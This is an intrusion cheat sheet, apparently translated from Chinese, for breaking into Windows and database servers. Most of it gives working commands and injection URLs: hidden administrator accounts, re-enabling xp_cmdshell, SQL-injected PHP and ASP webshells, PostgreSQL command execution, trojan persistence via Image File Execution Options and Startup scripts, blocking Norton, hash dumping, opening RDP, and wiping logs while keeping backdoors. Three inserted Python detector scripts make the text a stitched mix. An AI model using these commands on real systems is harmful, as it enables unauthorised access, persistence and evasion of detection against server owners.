1. net user administrator /passwordreq:no
This means "the administrator account does not require a password". If it executes successfully, the administrator password can be left blank when logging in over 3389 and you log straight in; once inside, run net user administrator /passwordreq:yes to restore the setting.
2. A rather neat way to create a clone account
First create a plain user account
Then export the registry. Then delete the account in Computer Management
Then re-import the registry and add the account to the administrators group
3. Look up the Radmin password
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
4. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
Create a subkey named "services.exe"
then under it create a (string value)
whose data is the full path of the trojan
5. runas /user:guest cmd
Tests user privileges!
6. tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'-- This actually makes use of the tlntadmn command; for details type /? and have a look. (This one needs administrator privileges.) Creating an identically named user and passing NTLM authentication needs no explanation from me, right?
7. After the intrusion: patching vulnerabilities, cleaning traces, placing backdoors
Basic vulnerabilities must be patched, such as SU privilege escalation and SA injection. For DBO injection consider removing xp_treelist and xp_regread; remember the web directory yourself. You absolutely must remember to clean up your traces. For SQL Server connections it is better to use Enterprise Manager; Query Analyzer leaves records under HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers, so delete them. When clearing IIS logs, do not use AIO-type tools that wipe the logs completely; choose a logcleaner-type tool that removes only the access records for a given IP, and if you can get the administrator's password with a gina, log in as him to clean the logs and use WYWZ for the final trace cleanup. That said, manual cleanup is safer. Finally leave a backdoor that generates no log entries. Several one-line backdoors, a standard backdoor and a cfm backdoor; I usually never skip any of them. Remember to modify the timestamps. There's also a rather ruthless trick: if the machine is just an ordinary zombie, drop a TXT on the administrator's desktop telling him you broke in, placed a certain backdoor and added a certain user (not your real important backdoor, of course) and ask him to clean it up. That way there is a good chance your real backdoor survives.
8. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c

for example:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
9. In MSSQL Server 2005 xp_cmdshell is switched off by default
To enable it you must turn it on under advanced options
You can inject it directly at the injection point
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
then ;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
or
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
to restore cmdshell.
In Query Analyzer:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
then ;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
10. A new way to restore xp_cmdshell
After the extended stored procedure has been deleted there is a very simple way to restore it:
Deletion
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

Restoration
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

This restores it directly, without caring whether sp_addextendedproc still exists
-----------------------------
Statement to delete the extended stored procedure xp_cmdshell:
exec sp_dropextendedproc 'xp_cmdshell'
SQL statement to restore cmdshell
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

SQL statement to enable cmdshell
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

Check whether the extended stored procedure exists
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means it is OK
Restore xp_cmdshell
exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means it is OK

Otherwise upload xplog70.dll
exec master.dbo.sp_addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
SQL statement to block cmdshell
sp_dropextendedproc "xp_cmdshell"
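As an added example that is not part of the original notes, here is a small Python detector a defender can run over captured T-SQL batch text (for instance from a SQL Server audit or trace) to flag the xp_cmdshell re-enabling, extended-procedure registration, sp_oacreate and login-hash patterns listed in items 8 to 10 above. The sample batches are constructed for this example, and the rule names and the normalize() step that undoes the 'str'+'ing' literal-splitting trick are my own.

```python
import re

# Constructed sample of captured T-SQL batch text, as a SQL Server audit or
# trace would record it; these lines are made up for this example.
SAMPLE_BATCHES = [
    "SELECT name FROM sys.tables WHERE type = 'U'",
    "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; "
    "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;",
    'dbcc addextendedproc("xp_cmdshell","xplog70.dll")',
    "declare @shell int exec sp_oacreate 'wscript.shell',@shell output",
    "EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')",
    "SELECT password_hash FROM sys.sql_logins WHERE name = 'sa'",
    "UPDATE orders SET status = 'shipped' WHERE id = 42",
]

# Detection rules: (finding, regex). Case-insensitive because T-SQL is.
RULES = [
    ("xp_cmdshell enabled via sp_configure",
     re.compile(r"sp_configure\s*'xp_cmdshell'\s*,\s*1", re.I)),
    ("extended procedure registered",
     re.compile(r"dbcc\s+addextendedproc|sp_addextendedproc", re.I)),
    ("OLE automation shell object created",
     re.compile(r"sp_oacreate\s*'wscript\.shell'", re.I)),
    ("login password hashes read",
     re.compile(r"sys\.sql_logins|sysxlogins", re.I)),
    ("xp_cmdshell referenced",
     re.compile(r"\bxp_cmdshell\b", re.I)),
]


def normalize(batch):
    """Undo the 'str'+'ing' literal-splitting seen in EXEC('ma'+'ster..x'+...)
    so the procedure name is contiguous again, then collapse whitespace."""
    folded = re.sub(r"'\s*\+\s*'", "", batch)
    return " ".join(folded.split())


def detect(batches):
    """Return [(batch, [findings...])] for every batch that triggers a rule."""
    results = []
    for batch in batches:
        text = normalize(batch)
        hits = [name for name, rx in RULES if rx.search(text)]
        if hits:
            results.append((batch, hits))
    return results


if __name__ == "__main__":
    for batch, hits in detect(SAMPLE_BATCHES):
        print(f"{'; '.join(hits)}\n    {batch}")
```

The folding in normalize() also joins ordinary string concatenation, which is harmless here because the rules only look for procedure names; a production rule set would pair this with a baseline of which logins legitimately call sp_configure.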
-------------------------
Clear the 3389 login records with a single built-in command:
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f

Then delete the Default.rdp file in the current account's My Documents folder
View the current user's privileges in mysql
show grants for

The following statements give the same privileges as the ROOT user. You will have run into this when taking sites: root's mysql account may only connect locally and refuses remote connections. The following method solves that: it creates a user itpro with password 123 and the same privileges as root, allowed to connect from any host, so you can conveniently operate on the database remotely from your own machine.

Create USER 'itpro'@'%' IDENTIFIED BY '123';

GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;

When you are done, remember to remove your footprints.

Drop USER 'itpro'@'%';

Drop DATABASE IF EXISTS `itpro`;
Getting SYSTEM privileges as the current user
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
sc start SuperCMD
Code:
<SCRIPT LANGUAGE="VBScript">
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","nosec")
od.SetPassword "123456abc!@#"
od.SetInfo
Set of=GetObject(os&"/nosec",user)
oe.add os&"/nosec"
</Script>
<script language=javascript>window.close();</script>
Bypassing the CAPTCHA restriction to get into the backend and take a shell
Code:
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000

Save as code.reg, import it into the registry, restart IE
and that's it
Writing a shell via union
Code:
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*

Applied to the dedecms injection vulnerability: writing a shell without backend access
In the dedecms backend, when there is no file manager and no outfile privilege,
go to Plugin Management - Virus Scan
and write a one-liner into include/config_hand.php
Code:
>';?><?php @eval($_POST[cmd]);?>

in the format above
In Oracle, after logging in as a low-privileged user you can run the following statement to query the password hashes of sys and other users, then crack them with Cain
Code:
select username,password from dba_users;
mysql remote-connection user
Code:

Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

1. Query the terminal (RDP) port
XP & 2003: REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

Generic: regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
type tsp.reg

2. Enable terminal services on XP & 2003

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3. Change the terminal port to 20008 (0x4E28)

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

4. Remove the XP & 2003 firewall restriction on terminal services port 3389 and the IP connection restriction

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
5. Enable the Win2000 terminal service on port 3389 (requires reboot)
echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo "Enabled"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo "ShutdownWithoutLogon"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo "TSEnabled"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo "Hotkey"="1" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg

6. Force a reboot of Win2000 & Win2003 (the system reboots automatically after the last command)

@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf

7. Disable TCP/IP port filtering (requires reboot)

REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f

8. When the terminal has reached its maximum number of connections, use the command below to connect

mstsc /v:ip:3389 /console

9. Adjust NTFS partition permissions

cacls c: /e /t /g everyone:F (gives everyone full control of drive C:)

cacls %systemroot%\system32\*.exe /d everyone (denies everyone access to the exe files in system32)
------------------------------------------------------
3389.vbs
On Error Resume Next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
Set R = CreateObject("WScript.Shell")
R.run("Shutdown.exe -f -r -t 0")
Delete the registry value for awgina.dll
Code:
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f

Code:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash

Set it to 1 to turn off LM hash storage
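Added example, not part of the original notes: a Python parser for the .reg export format used throughout these notes (REGEDIT4 and "Windows Registry Editor Version 5.00"), followed by an audit pass over the settings the notes change: fDenyTSConnections, the RDP PortNumber, GinaDLL, the Image File Execution Options subkey and NoLMHash. A defender can run it over a `regedit /e` export from a host to see at a glance whether those values have been touched. The sample export, the key constants and the finding texts are constructed for this example; the IFEO value name "Debugger" is the standard one Windows consults and is an assumption here, since the notes only say "a string value".

```python
import re

# Constructed .reg export in the REGEDIT format this page uses; no real host.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00004e28

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"GinaDLL"="awgina.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\services.exe]
"Debugger"="C:\\Temp\\hidden.exe"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"NoLMHash"=dword:00000001
'''

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')

TS = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
RDP_TCP = TS + r"\WinStations\RDP-Tcp"
WINLOGON = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
IFEO = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
LSA = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"


def parse_reg(text):
    """Parse a REGEDIT4 / 'Windows Registry Editor Version 5.00' export into
    {key_path: {value_name: value}}. dword:XXXXXXXX becomes an int, quoted
    strings are unescaped, anything else (hex:, hex(2):...) is kept raw."""
    tree, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("Windows Registry Editor", "REGEDIT4", ";")):
            continue
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            tree.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name, data = m.group(1), m.group(2)
            if data.lower().startswith("dword:"):
                value = int(data[6:], 16)
            elif len(data) >= 2 and data.startswith('"') and data.endswith('"'):
                value = data[1:-1].replace('\\\\', '\\').replace('\\"', '"')
            else:
                value = data
            tree[current][name] = value
    return tree


def audit(tree):
    """Flag the settings these notes manipulate. Key lookup is
    case-insensitive, as the registry itself is."""
    lookup = {k.lower(): v for k, v in tree.items()}

    def get(key, name):
        return lookup.get(key.lower(), {}).get(name)

    findings = []
    if get(TS, "fDenyTSConnections") == 0:
        findings.append("Remote Desktop enabled (fDenyTSConnections=0)")
    port = get(RDP_TCP, "PortNumber")
    if port is not None and port != 3389:
        findings.append(f"RDP listener moved to non-default port {port}")
    gina = get(WINLOGON, "GinaDLL")
    if gina:
        findings.append(f"Custom GINA registered: {gina}")
    for key, values in tree.items():
        # "Debugger" is the IFEO value name Windows consults (assumption: the
        # notes above only call it "a string value").
        if key.lower().startswith(IFEO.lower() + "\\") and "Debugger" in values:
            exe = key.rsplit("\\", 1)[-1]
            findings.append(f"IFEO debugger set on {exe}: {values['Debugger']}")
    if get(LSA, "NoLMHash") != 1:
        findings.append("LM hashes still stored (NoLMHash != 1)")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_reg(SAMPLE_REG)):
        print(finding)
```

The parser reads both the Wds\rdpwd\Tds\tcp and WinStations\RDP-Tcp keys if they are present; the audit checks the WinStations one because that is the port the listener actually uses. An export of only the keys in question (as with `regedit /e tsp.reg "<key>"` above) keeps the file small enough to diff against a known-good copy.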
Database security: commonly used commands when intruding into Oracle databases
Recently I ran into a server that used an Oracle database; after cramming Oracle and consulting experts I finally got hold of all the user passwords of the site's backend management interface. I found Oracle really cumbersome to operate, so to spare brothers some detours later on I've compiled the commands that are essential during an intrusion.
1. su - oracle    Not required; useful when you don't have the DBA password, as it lets you enter the sqlplus prompt without a password.
2. sqlplus /nolog or sqlplus system/manager or ./sqlplus system/manager@ora9i;
3. SQL>connect / as sysdba ;(as sysoper) or
connect internal/oracle AS SYSDBA ;(scott/tiger)
conn sys/change_on_install as sysdba;
4. SQL>startup; starts the database instance
5. View all current databases: select * from v$database;
select name from v$database;
6. desc v$database; view the database's structure fields
7. How to see which users have SYSDBA or SYSOPER privileges:
SQL>select * from V_$PWFILE_USERS;
Show user; shows the currently connected database user
8. Enter the test database: database test;
9. View all database instances: select * from v$instance;
e.g. ora9i
10. View all tables in the current database:
SQL> select TABLE_NAME from all_tables;
select * from all_tables;
SQL> select table_name from all_tables where table_name like '%u%';
TABLE_NAME
------------------------------
_default_auditing_options_
11. View a table's structure: desc all_tables;
12. Show the structure of all columns of CQI.T_BBS_XUSER:
desc CQI.T_BBS_XUSER;
13. Get the records in CQI.T_BBS_XUSER:
select * from CQI.T_BBS_XUSER;
14. Add a database user: (test11/test)
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
15. Grant the user privileges:
grant connect,resource,dba to test11;
grant sysdba to test11;
commit;
16. Change database users' passwords (change the sys and system passwords to test):
alter user sys identified by test;
alter user system identified by test;
applicationContext-util.xml
applicationContext.xml
struts-config.xml
web.xml
server.xml
tomcat-users.xml
hibernate.cfg.xml
database_pool_config.xml

\WEB-INF\classes\hibernate.cfg.xml    database connection configuration
\WEB-INF\server.xml    similar to http.conf + mysql.ini + php.ini
\WEB-INF\struts-config.xml    file directory structure
spring.properties contains the name of hibernate.cfg.xml

C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
If none of these can be found, look at the class files.
View the shared files in a virtual machine:
Run in the VM's cmd
\\.host\Shared Folders
Tips for finding the terminal (RDP) port from a cmdshell
Finding the terminal:
Step 1: Tasklist /SVC lists all processes and system services with their PID values!
The service name for terminal services is TermService
Step 2: use netstat -ano to list the PID for every port!
Find the port that matches that PID
Query the password hash in SQL Server 2005
SELECT password_hash FROM sys.sql_logins where name='sa'
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
Exporting a shell from Access
Complete code for adding a user via mysql on a Chinese-language operating system:

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
drop table a;

English version:
use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
drop table a;

create table a (cmd BLOB);
insert into a values (CONVERT(<trojan hex code>,CHAR));
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\mm.exe';
drop table a;
A note on how to deal with the nasty Norton
Look up the path of the Norton service
sc qc ccSetMgr
Then set permissions to deny access. Be thorough.
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone

Then restart the server
iisreset /reboot
That takes care of it. But when you're done, remember to restore the permissions.
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin

EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
Some notes on postgresql injection
How to get a webshell
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
How to read a file
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
http://127.0.0.1/postgresql.php?id=1;copy myfile from '/etc/passwd';
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
There are two ways to execute commands: one needs a custom libc-backed function, the other uses pl/python.
Of course the postgresql version must be above 8.x for these.
Create a system function:
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT

Create an output table:
CREATE TABLE stdout(id serial, system_out text)

Run the shell command, writing its output into the output table:
SELECT system('uname -a > /tmp/test')
copy the output into the table;
COPY stdout(system_out) FROM '/tmp/test'

Read the echoed output from the output table to judge whether execution succeeded

SELECT system_out FROM stdout
Below is a test example
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --

/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C' STRICT --

/store.php?id=1; SELECT system('uname -a > /tmp/test') --

/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
/store.php?id=1 UNION ALL SELECT NULL,(SELECT system_out FROM stdout ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
net stop sharedaccess    stop the default firewall
netsh firewall show    show/config default firewall
netsh firewall set notifications disable    disable the notification when a program is blocked by the default firewall
netsh firewall add allowedprogram c:\1.exe Svchost    add a program that is allowed through the default firewall
Method for changing the 3389 port (harder to find with scanners after the change)
Change the server-side port setting; two places in the registry need changing
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
The PortNumber value, default 3389; change it to the port you want, e.g. 6000

Second place:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
The PortNumber value, default 3389; change it to the port you want, e.g. 6000
That's all. Reboot the system and it's done
Script for logging 3389 remote logins
Save as a bat file
date /t >>D:\sec\TSlog\ts.log
time /t >>D:\sec\TSlog\ts.log
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
start Explorer
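Added example, not from the original notes: the two-step TermService lookup described under "finding the terminal" (tasklist /SVC, then netstat -ano) and the :3389 capture in the batch file above, done in Python over constructed tasklist and netstat output. Unlike the batch file, which hard-codes port 3389, it resolves the port from the TermService PID first, so the same check still works on a host where the RDP listener has been moved as described in the port-changing notes. The function names, sample PIDs, addresses and ports are assumptions constructed for this example.

```python
import re

# Constructed output of `tasklist /svc` and `netstat -ano` for one host;
# the PIDs, addresses and ports are made up for this example.
SAMPLE_TASKLIST = """\
Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
svchost.exe                    980 Dnscache, LmHosts
svchost.exe                   1040 TermService
"""

SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       716
  TCP    0.0.0.0:20008          0.0.0.0:0              LISTENING       1040
  TCP    192.168.1.10:20008     203.0.113.7:51123      ESTABLISHED     1040
  TCP    192.168.1.10:20008     198.51.100.9:4412      ESTABLISHED     1040
  TCP    192.168.1.10:445       192.168.1.20:50011     ESTABLISHED     4
"""

# tasklist rows: "<image name>  <pid>  <svc1, svc2>"; image names may contain spaces.
TASK_RE = re.compile(r"^(.*?)\s+(\d+)\s+(.+?)\s*$")
# netstat TCP rows: local, foreign, state, pid.
TCP_RE = re.compile(r"^\s*TCP\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d+)\s*$")


def split_endpoint(addr):
    """'192.168.1.10:20008' -> ('192.168.1.10', 20008); rsplit keeps IPv6 intact."""
    host, port = addr.rsplit(":", 1)
    return host, int(port)


def service_pid(tasklist_text, service="TermService"):
    """PID of the process hosting `service`, or None (step 1 of the notes)."""
    for line in tasklist_text.splitlines():
        m = TASK_RE.match(line)
        if m and service in [s.strip() for s in m.group(3).split(",")]:
            return int(m.group(2))
    return None


def tcp_rows(netstat_text):
    for line in netstat_text.splitlines():
        m = TCP_RE.match(line)
        if m:
            local, remote, state, pid = m.groups()
            yield split_endpoint(local), split_endpoint(remote), state, int(pid)


def listening_ports(netstat_text, pid):
    """Local ports on which `pid` is LISTENING (step 2 of the notes)."""
    return sorted({local[1] for local, _, state, p in tcp_rows(netstat_text)
                   if p == pid and state == "LISTENING"})


def rdp_sessions(netstat_text, port):
    """(remote_ip, remote_port) of every ESTABLISHED session to `port`; this is
    the view the ts.log batch file records, but keyed by the resolved port."""
    return [remote for local, remote, state, _ in tcp_rows(netstat_text)
            if local[1] == port and state == "ESTABLISHED"]


def rdp_report(tasklist_text, netstat_text):
    """Combine both steps: TermService PID -> listening ports -> sessions."""
    pid = service_pid(tasklist_text)
    ports = listening_ports(netstat_text, pid) if pid is not None else []
    return {
        "pid": pid,
        "ports": ports,
        "sessions": {port: rdp_sessions(netstat_text, port) for port in ports},
    }


if __name__ == "__main__":
    print(rdp_report(SAMPLE_TASKLIST, SAMPLE_NETSTAT))
```

On a live host the two sample strings would be replaced by the captured output of the two commands; appending the returned sessions with a timestamp gives the same record the batch file writes to ts.log, with the port no longer assumed.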
mstsc parameters:

Remote Desktop Connection

MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?

<Connection File> -- specifies the name of the .rdp file for the connection.
/v:<server[:port]> -- specifies the terminal server to connect to.
/console -- connects to the console session of the server.
/f -- starts the client in full-screen mode.
/w:<width> -- specifies the width of the remote desktop screen.
/h:<height> -- specifies the height of the remote desktop screen.
/edit -- opens the specified .rdp file for editing.
/migrate -- migrates legacy connection files created by Client Connection Manager to new .rdp connection files.

mstsc /console connects to session 0, whereas plain mstsc opens a separate virtual session, which is equivalent to logging into the computer a second time. In other words, connecting with the console parameter gets you the desktop shown on the monitor. Try it; it comes in handy sometimes, especially with some software that
mstsc /console /v:124.42.126.xxx    bypasses the limit on the number of terminal connections
Enabling 3389 from the command line
net user asp.net aspnet /add
net localgroup Administrators asp.net /add
net localgroup "Remote Desktop Users" asp.net /add
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
